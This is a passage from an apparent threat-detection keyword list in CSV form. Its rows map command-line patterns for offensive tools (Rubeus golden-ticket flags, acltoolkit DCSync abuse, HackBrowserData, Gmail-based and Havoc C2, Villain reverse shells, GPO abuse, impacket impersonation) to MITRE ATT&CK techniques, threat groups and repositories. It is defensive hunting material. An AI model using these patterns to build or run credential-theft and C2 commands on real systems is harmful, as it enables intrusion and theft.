- T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"* github repos list --user *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"* give-dcsync*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* give-genericall * -target-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* gkrellm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"* --gmsa-decrypt-lsa *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* go build -o padre .*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"* golden * /badpwdcount*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* gophish-*.zip*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"* 'GPODDITY$' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --gpo-id * --domain * --command *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --gpo-id * --gpo-type * --no-smb-server *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --GPOName * --FilterEnabled --TargetDnsName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* gpp_autologin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* gpp_password*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"* --greeting * --personalize *--securelink*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"* -grouper2 -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -H * -u * -p * -r *C$/Users*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"* -h *-p * -c cypher.bin -k key.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"* hack.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* HackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"* HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" +"* hackergu *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hadoop-datanode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hadoop-jobtracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hadoop-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* harvest * /monitorinterval:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* -hasbootstraphint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* -hashes * -spn * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -hashes lm:nt -gpo-id * -powershell *","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"* --hash-type * --attack-mode *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"* hashview-agent *","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"* havoc-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"* hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* HiddenDesktop.cna*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"* hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --hoax-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" +"* --host * --port * --executable *.exe --command *cmd.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* host -p * --allow-anonymous --protocol https*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"* hostenum.py *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"* --host-file *.txt -u * --prompt --admin --no-banner*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"* hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* hostmap-crtsh.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 